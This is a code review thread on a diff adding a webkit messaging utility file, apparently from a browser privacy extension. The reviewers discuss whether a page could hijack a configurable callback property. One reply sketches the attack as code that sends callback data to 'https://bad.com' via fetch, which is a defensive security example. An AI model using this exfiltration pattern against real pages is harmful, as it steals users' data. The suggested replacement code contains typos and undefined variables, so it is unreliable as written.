src/appleDeviceUtils/appleDeviceUtils.js

```diff
@@ -0,0 +1,105 @@
+// Do not remove -- Apple devices change this when they support modern webkit messaging
+let hasModernWebkitAPI = false
+// INJECT hasModernWebkitAPI HERE
+
+// The native layer will inject a randomised secret here and use it to verify the origin
+const secret = 'PLACEHOLDER_SECRET'
+
+const ddgGlobals = window.navigator.ddgGlobals
+
+/**
+ * Sends message to the webkit layer
+ * @param {String} handler
+ * @param {*} data
+ * @returns {*}
+ */
+const wkSend = (handler, data = {}) =>
+    window.webkit.messageHandlers[handler].postMessage(data)
+
+/**
+ *
+ * @param {String} randomMethodName
+ * @param {Function} callback
+ */
+const generateRandomMethod = (randomMethodName, callback) => {
+    Object.defineProperty(ddgGlobals.window, randomMethodName, {
+        enumerable: false,
+        // configurable, To allow for deletion later
+        configurable: true,
+        writable: false,
+        // Use proxy to ensure stringification isn't possible
+        value: new Proxy(function () {}, {
```

Comment:
Considering the previous comment, I suppose it's safe to skip the Proxy step here, because even with toString, the attacker doesn't get anything meaningful. Is this correct?

Reply:
**Sorry.** I think we have to change the implementation here actually. Because the property is configurable the page can also call:
```
Object.defineProperty(ddgGlobals.window, randomMethodName, {
        // Use proxy to ensure stringification isn't possible
        value: (deets) => {
            fetch('https://bad.com', {body: JSON.stringify(deets)})
            callback(deets)
        }
})
```

So I think we need to expose a global handler that we don't delete:

```
const callbacks = new ddgGlobals.WeakMap()
const generateRandomMethod = (randomCallbackName, callback) => {
  callbacks.set(randomCallbackName, callback)
};
Object.defineProperty(ddgGlobals.window, randomMethodName, {
    enumerable: false,
    configurable: false,
    writable: false,
    value: (...args) => {
      const callback = calbacks.get(args[0])
      callback(...args);
      callbacks.delete(key)
    }
});
```

and then in `wkSendAndWait` pass along both methodName and callback name

Reply:
Ignore this, I was making the wrong assumptions here given prior conversations.

Yeah feel free to strip the proxy part based on the current impl.